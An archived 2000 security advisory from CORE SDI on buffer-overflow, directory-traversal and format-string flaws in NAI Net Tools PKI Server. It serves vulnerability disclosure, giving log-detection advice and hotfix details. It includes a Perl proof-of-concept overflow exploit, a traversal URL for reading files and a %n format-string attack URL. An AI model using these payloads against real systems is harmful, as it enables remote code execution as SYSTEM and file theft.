exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

core-sdi.net.tools

core-sdi.net.tools
Posted Aug 6, 2000
Authored by Ivan Arce | Site core-sdi.com

CORE SDI Security Advisory - NAI Net Tools PKI Server vulnerabilities. While investigating the exploitability of a buffer overflow in the Net Tools PKI Server from Network Associates Inc. we discovered three new vulnerabilities not fixed by hotfix 1, including buffer overflows and format bugs which allow remote attackers to execute arbitrary code. Perl proof of concept exploit included.

tags | remote, overflow, arbitrary, perl, vulnerability, proof of concept
SHA-256 | 851d469fd06907ffafd8c19e1da95cdb05443f7df3e7b6b1b7fd894c41df184f

core-sdi.net.tools

Change Mirror Download
-----------------------------------------------------------------------

CORE SDI S.A.
Buenos Aires, Argentina
<http://www.core-sdi.com>


CORE SDI Security Advisory
August 2nd, 2000

NAI Net Tools PKI Server vulnerabilities

-----------------------------------------------------------------------

While investigating the exploitability of a buffer overflow in
the Net Tools PKI Server from Network Associates Inc. we discovered
three new vulnerabilities not fixed by hotfix 1, released to fix
problems reported by Jim Stickley from Garrison Technologies Inc.
(see http://www.securityfocus.com/bid/1363 and
http://www.securityfocus.com/bin/1364)

Problem description
~~~~~~~~~~~~~~~~~~~~

Problem #1: Buffer overflow in strong.exe

A buffer overflow in the web server component of the
Net Tools PKI server allows a remote attacker to execute
arbitrary code as SYSTEM on the machine running it.

To determine whether anyone has attempted to exploit this
vulnerability, check the enroll-access.log and the
admin-access.log files in the WebServer/logs directory of your
Net Tools PKI Server installation. Search for any log entries
which are excessively long (greater than 500 characters). Each
log entry can then be examined to see the IP address of the
computer that submitted the request.

Problem #2: Directory traversal vulnerability

The default installation of Net Tools PKI server allows
a remote attacker to view and download any file residing
on the server.

To determine whether anyone has attempted to exploit this
vulnerability, check the enroll-access.log and the
admin-access.log files in the WebServer/logs directory of your
Net Tools PKI Server installation. Search for any log entries
containing "..\" within them. Each log entry can then be examined
to see the IP address of the computer that submitted the request.

Problem #3: Format strings with user supplied data

The Net Tools PKI Server fail to validate properly the data
passed as arguments to the server's logging routines and
allows a remote attacker to execute arbitary code as
SYSTEM on the machine running it.

Impact
~~~~~~

Problem #1: Remote unauthenticated access to the PKI Server,
execution of arbitrary commands as the user running
the enrollment server (System)

Problem #2: Remote unauthenticated access to any file on the PKI
server

Problem #3: Remote unauthenticated access to the PKI Server,
execution of arbitrary commands as the user running
the enrollment server (System)

Technical details
~~~~~~~~~~~~~~~~~

Problem #1: Buffer overflow in strong.exe

Strong.exe is the web server component of the PKI Server,
it services requests over SSL on ports 443/tcp, 444/tcp and
445/tcp (default ports).
While connections to port 443/tcp require both client and
server autentication using certificates, connections to
port 444/tcp requires no client authentication, therefore
any user with network connectivity to the PKI server can
connect via HTTPS to that port.

The service running on port 443/tcp is called the
Administrative Web Server and its therefore obvious the requirement for
mutual authentication.
The service running on port 444/tcp is the Enrollment Web Server
and does not require a client side certificate by default.
Both web servers are actually Virtual servers serviced by
strong.exe

A buffer overflow is present in the function that generates log data,
that allows to overwrite the stack using user supplied data passed
to the server as an URL in the HTTPS request.

https://host:444/<2965 'A' chars>

EAX=66206465 EBX=00F3E1C0 ECX=01FFF224 EDX=20414141
EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP = 0040977B

The value in EAX is part of the string (DATE+PATH+FILE+REASON)
that gets logged, detailing the reason for the failure.
Since it is not a valid address, a segmentation fault is rised
a few instructions after the overwrite:

mov ecx,[eax+000000E4]

The above does not overwrite EIP and it kills the
server before its overwritten, but a slight variation of it
will let an attacker overwrite EBP, EIP and by carefully
overwriting local variables, control the execution of arbitrary
code on the target machine.

A sample, proof of concept perl script exemplifies this:

-- cut here
#!/usr/bin/perl
# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port an create the html file:
#./pkiluso.pl > test.html
#Open the html in a SSL compatible browser and click on the link. puf!
#Juliano Rizzo (c) 2000 juliano@core-sdi.com

$host = "localhost";
$port = "444";
$shell_code= "\x90\x90\x90\x90";

#We can set the values of EIP and EBP, our code is on the stack
#and in 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket)
#$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
$noplen = (2965 - length($shell_code));
print "<html><body><a href=\"https://".$host.":".$port."/";
print "\x90"x$noplen;
print
$shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01".
"\">Click here to exploit.!</a></body></html>";

note: wrapped for readability
----

Problem #2: Directory traversal vulnerability

By specifying '..\' in HTTPS requests to the enrollment server,
an attacker can navigate the server's file system and view/download
any file if its name is known.
By default the enrollment server uses
\Program Files\Network Associates\Net Tools PKI
Server\WebServer\enroll-server
as the Web Root directory, if a file name is known (ie. autoexec.bat)
the attacker just needs to supply the remaining path components to
access it:

https://host:444/..\..\..\..\..\autoexec.bat

will display the contents of the file in the browser

If a filename is not known, the web server will reveal its
web root directory in an error messages shown to the client:

https://host:444..\..\pirulo.pdf will result in:

File Not Found

The requested URL /..\..\pirulo.pdf was not found on this server.

There was also some additional information available about the error:
[Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network
Associates\
Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed
for a.b.c.d, reason: File does not exist

Problem #3: Format strings with user supplied data

The user supplied URL is processed by Strong.exe and if the .XUDA
extension is found, the request is forwarded to XUDAD.EXE for futher
processing. Prior to this "hand-off" the URL string is parsed, filtered
for metacharacters and passed to a function that logs the request.
Somewhere along the processing path, the user supplied data becomes
the format string for a formatted output function similar to the
ANSI C sprintf(). This allows a remote attacker to provide data that
will force that function into overwritting arbitrary portions of
the process memory and cause either a denial of service attack or
the execution of arbittrary code.

To exemplify this, the following URL will cause a DoS:

https://host:444/%25%25s.xuda

Notice that the hex value 0x25 represent the ASCII character '%',
thus the URL string will get converted to "%%s.xuda" and subsequentelly
to "%s.xuda".

A more elaborated attack, might try to overwrite the return address on
the stack to force the server into executing arbitrary code.

Proof of concept , sample URL:

https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25\
%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
%25x%25%25x%25x%25n.xuda

note: the string has been wrapped for readability.


Fix information
~~~~~~~~~~~~~~~
Network Associates Inc. has released Hotfix 3 for the Net Tools PKI
Server.
It corrects the three problems. It can be obtained from:

http://www.nai.com/asp_set/download/upgrade/find.asp

Or contact Network Associates Technical support at 1-800-722-3709.

Vulnerable systems
~~~~~~~~~~~~~~~~~~
Net Tools PKI server 1.0 for NT
Net Tools PKI server 1.0 for NT (hotfix 1)
Net Tools PKI server 1.0 for NT (hotfix 2)

Additional information
~~~~~~~~~~~~~~~~~~~~~~
These vulnerabilities were discovered by Juliano Rizzo at CORE SDI S.A.

Previous problems were found and reported to Network Associates Inc.
by Jim Stickley from Garrison Technologies Inc.

We wish to thank Network Associates Inc. for their prompt response
to the issues rised by this advisory.


Copyright Notice:
~~~~~~~~~~~~~~~~~
The contents of this advisory are copyright (c) 2000 CORE SDI S.A. and
may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.

$Id: PKI_Server-advisory.txt,v 1.4 2000/08/02 18:15:40 iarce Exp $

--
"Understanding. A cerebral secretion that enables one having it to know
a house from a horse by the roof on the house,
It's nature and laws have been exhaustively expounded by Locke,
who rode a house, and Kant, who lived in a horse." - Ambrose Bierce


==================[ CORE Seguridad de la Informacion S.A. ]=========
Iván Arce
Presidente
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A
email : iarce@core-sdi.com
http://www.core-sdi.com
Pte. Juan D. Peron 315 Piso 4 UF 17
1038 Capital Federal
Buenos Aires, Argentina. Tel/Fax : +(54-11) 4331-5402
Casilla de Correos 877 (1000) Correo Central
=====================================================================

--- For a personal reply use iarce@core-sdi.com

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close